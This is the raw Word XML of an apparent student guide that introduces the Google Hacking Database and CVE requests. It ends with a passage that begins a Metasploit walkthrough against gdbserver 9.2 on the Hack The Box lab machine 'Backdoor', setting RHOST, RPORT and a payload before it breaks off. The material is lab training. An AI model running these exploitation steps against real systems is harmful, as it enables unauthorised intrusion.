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3F676" w14:textId="77777777" w:rsidR="00BC5980" w:rsidRDefault="001A03A9" w:rsidP="001A03A9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E2FB5" w14:textId="77777777" w:rsidR="00BC5980" w:rsidRDefault="00BC5980" w:rsidP="001A03A9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BA9FD3" w14:textId="77777777" w:rsidR="00BC5980" w:rsidRDefault="00BC5980" w:rsidP="001A03A9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEB9F0F" w14:textId="77777777" w:rsidR="00BC5980" w:rsidRDefault="00BC5980" w:rsidP="00BC5980">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E12039" wp14:editId="70ACE961">
            <wp:extent cx="5557962" cy="7193453"/>
            <wp:effectExtent l="0" t="0" r="508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56" cy="72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8EA8" w14:textId="72414471" w:rsidR="001A03A9" w:rsidRPr="00BC5980" w:rsidRDefault="001A03A9" w:rsidP="00BC5980">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Google hacking Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3000AAB8" w14:textId="24A21728" w:rsidR="001A03A9" w:rsidRPr="002C63F8" w:rsidRDefault="001A03A9" w:rsidP="001A03A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD5B37C" w14:textId="2EA507C5" w:rsidR="009F2C93" w:rsidRPr="00516322" w:rsidRDefault="009F2C93" w:rsidP="008F47A7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31C055" w14:textId="280EA434" w:rsidR="009F2C93" w:rsidRPr="008F47A7" w:rsidRDefault="009F2C93" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Google Hacking Database (GHDB) is a categorized index of Internet search engine queries designed to uncover interesting, and usually sensitive, information made publicly available on the Internet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE2699" w14:textId="1DDB8EE8" w:rsidR="002766B5" w:rsidRDefault="002766B5" w:rsidP="009F2C93"/>
    <w:p w14:paraId="11484512" w14:textId="0C27D880" w:rsidR="002766B5" w:rsidRPr="00516322" w:rsidRDefault="002766B5" w:rsidP="002766B5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t>What Is CVE (</w:t>
      </w:r>
      <w:r w:rsidR="008F47A7" w:rsidRPr="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t>common vulnerabilities and exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="00516322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="double"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9685C" w14:textId="511584A9" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7"/>
    <w:p w14:paraId="7F756487" w14:textId="77777777" w:rsidR="008F47A7" w:rsidRPr="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) system provides a reference-method for publicly known </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>information-security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and exposures. The United States' </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>National Cybersecurity FFRDC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, operated by </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">The </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mitre</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> Corporation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, maintains the system, with funding from the US </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>National Cyber Security Division</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> of the US Department of Homeland Security.The system was officially launched for the public in September 1999.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559E9397" w14:textId="657AA1FC" w:rsidR="008F47A7" w:rsidRPr="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>Offical page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90EE22" w14:textId="00963410" w:rsidR="008F47A7" w:rsidRPr="008F47A7" w:rsidRDefault="00BC5980" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="008F47A7" w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:vertAlign w:val="superscript"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="360C65DE" w14:textId="0E8F8629" w:rsidR="008F47A7" w:rsidRDefault="00BC5980" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="008F47A7" w:rsidRPr="008F47A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:vertAlign w:val="superscript"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/google-hacking-database</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="331A88FE" w14:textId="1C0657A9" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5DAAA3" w14:textId="49E54D5C" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F47A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">How We Request For CVE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DFBF3" w14:textId="5AD59C42" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2EED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the official website of cve id </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="007A2EED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FD8707C" w14:textId="2E2797E4" w:rsidR="007A2EED" w:rsidRPr="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEF46E5" w14:textId="24E1B18D" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="00F517F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2EED">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2623B1E0" wp14:editId="7E842A5A">
            <wp:extent cx="3373211" cy="1757238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8ABC9B0-DA53-4FD5-8BFC-06B9B26AD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8ABC9B0-DA53-4FD5-8BFC-06B9B26AD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" t="3789" r="966" b="4838"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3400386" cy="17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C298" w14:textId="79421117" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76969152" w14:textId="110D3D20" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2E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6623D" wp14:editId="1EB7ED09">
            <wp:extent cx="5780598" cy="310362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4" t="18745" r="6342" b="11457"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5800902" cy="311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EB9B5" w14:textId="31B3B5A4" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564C1816" w14:textId="2715F886" w:rsidR="007A2EED" w:rsidRDefault="007A2EED" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7F5373" w14:textId="55B15CE9" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10464A56" w14:textId="77777777" w:rsidR="00F517F9" w:rsidRPr="007A2EED" w:rsidRDefault="00F517F9" w:rsidP="007A2EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52AE3C4A" w14:textId="6E373FD9" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58995CF2" w14:textId="78C72156" w:rsidR="008F47A7" w:rsidRPr="008F47A7" w:rsidRDefault="00F517F9" w:rsidP="008F47A7">
      <w:pPr>
        <w:rPr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0A56E6F8" wp14:editId="641BE224">
            <wp:extent cx="5731510" cy="299879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8" t="18992" r="5628" b="11690"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="299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F2F52" w14:textId="1CBF66A2" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7"/>
    <w:p w14:paraId="75D10960" w14:textId="6F618E60" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7"/>
    <w:p w14:paraId="0C9FE54D" w14:textId="229426C5" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F18E33E" wp14:editId="77736FC7">
            <wp:extent cx="5860111" cy="3174364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4" t="18659" r="5630" b="11860"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5884831" cy="318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289D" w14:textId="2342C8BB" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7"/>
    <w:p w14:paraId="541B8287" w14:textId="3E6B51A8" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7"/>
    <w:p w14:paraId="362860FD" w14:textId="782BE662" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7"/>
    <w:p w14:paraId="5BA48E50" w14:textId="07F2976D" w:rsidR="00F517F9" w:rsidRDefault="00F517F9" w:rsidP="008F47A7"/>
    <w:p w14:paraId="0619AA8F" w14:textId="00FB6544" w:rsidR="00F517F9" w:rsidRDefault="008924E6" w:rsidP="008F47A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476885BE" wp14:editId="617791E7">
            <wp:extent cx="6050943" cy="2940332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1" t="38968" r="16988" b="16529"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6056891" cy="294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F4E92" w14:textId="43252C8D" w:rsidR="008F47A7" w:rsidRDefault="008F47A7" w:rsidP="008F47A7">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042AEAB4" w14:textId="7D7AA7D2" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008F47A7">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6585187A" w14:textId="350E0670" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008924E6"/>
    <w:p w14:paraId="7619B699" w14:textId="537F0976" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008924E6"/>
    <w:p w14:paraId="4B9AD3B3" w14:textId="0DB86015" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008924E6"/>
    <w:p w14:paraId="754AC83D" w14:textId="37E3A2E7" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008924E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F83F22E" wp14:editId="2E70CA1D">
            <wp:extent cx="5916304" cy="3309380"/>
            <wp:effectExtent l="0" t="0" r="825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7" t="16722" r="5217" b="8560"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5929268" cy="331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3DD4" w14:textId="5269B38C" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="008924E6"/>
    <w:p w14:paraId="5F5BD9D1" w14:textId="77777777" w:rsidR="008924E6" w:rsidRDefault="008924E6" w:rsidP="009F2C93"/>
    <w:p w14:paraId="60AE41D4" w14:textId="4F0ECB30" w:rsidR="00CE7AEF" w:rsidRPr="008924E6" w:rsidRDefault="00CE7AEF" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HACK THE SYSTEM WITH THE HELP OF </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00916592" w:rsidRPr="008924E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GHDB</w:t>
      </w:r>
      <w:r w:rsidR="008924E6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8924E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00916592" w:rsidRPr="0089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FCEA3" w14:textId="210F6A7B" w:rsidR="009F2C93" w:rsidRDefault="009F2C93" w:rsidP="009F2C93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CADA12" wp14:editId="7503391D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AB20" w14:textId="68389B42" w:rsidR="009F2C93" w:rsidRDefault="009F2C93" w:rsidP="009F2C93"/>
    <w:p w14:paraId="5C86CE18" w14:textId="006DCA18" w:rsidR="008924E6" w:rsidRPr="008924E6" w:rsidRDefault="009F2C93" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the exploit of gdbserver version 9.2 </w:t>
      </w:r>
      <w:r w:rsidR="003243E0" w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1AC4B" w14:textId="651B2736" w:rsidR="003243E0" w:rsidRPr="008924E6" w:rsidRDefault="003243E0" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hackthebox machine (“backdoor”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC296B" w14:textId="43097023" w:rsidR="006F3E1B" w:rsidRDefault="006F3E1B" w:rsidP="009F2C93"/>
    <w:p w14:paraId="5C1FBA64" w14:textId="2D99E935" w:rsidR="0015122C" w:rsidRPr="008924E6" w:rsidRDefault="002C63F8" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Open the MSF console </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049454E6" w14:textId="06616173" w:rsidR="002C63F8" w:rsidRDefault="002C63F8" w:rsidP="009F2C93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8C1758" wp14:editId="3D0866ED">
            <wp:extent cx="5764696" cy="1711571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52" b="4913"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5769183" cy="171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439F7" w14:textId="0B42FDFA" w:rsidR="002C63F8" w:rsidRPr="008924E6" w:rsidRDefault="002C63F8" w:rsidP="009F2C93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008924E6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> gdb server”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24160EBB" w14:textId="7615E28A" w:rsidR="002C63F8" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t>Use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0A048" w14:textId="77777777" w:rsidR="003243E0" w:rsidRDefault="003243E0" w:rsidP="009F2C93"/>
    <w:p w14:paraId="535AF5B1" w14:textId="701FC45B" w:rsidR="003243E0" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBCB998" wp14:editId="1C28AA4D">
            <wp:extent cx="5725160" cy="32200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D855" w14:textId="77777777" w:rsidR="003243E0" w:rsidRDefault="003243E0" w:rsidP="009F2C93"/>
    <w:p w14:paraId="28DEE56A" w14:textId="46E116E5" w:rsidR="003243E0" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443816E6" w14:textId="041E6A49" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t xml:space="preserve">Set RHOST :-(machine ip) </w:t>
      </w:r>
      <w:r w:rsidRPr="00384197">
        <w:t xml:space="preserve">10.10.11.125 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375D6D9" w14:textId="7E5CA113" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RPORT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00384197">
        <w:t xml:space="preserve">1337             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F2B41A" w14:textId="17AA1685" w:rsidR="00384197" w:rsidRDefault="00384197" w:rsidP="009F2C93">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>payloads :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00384197">
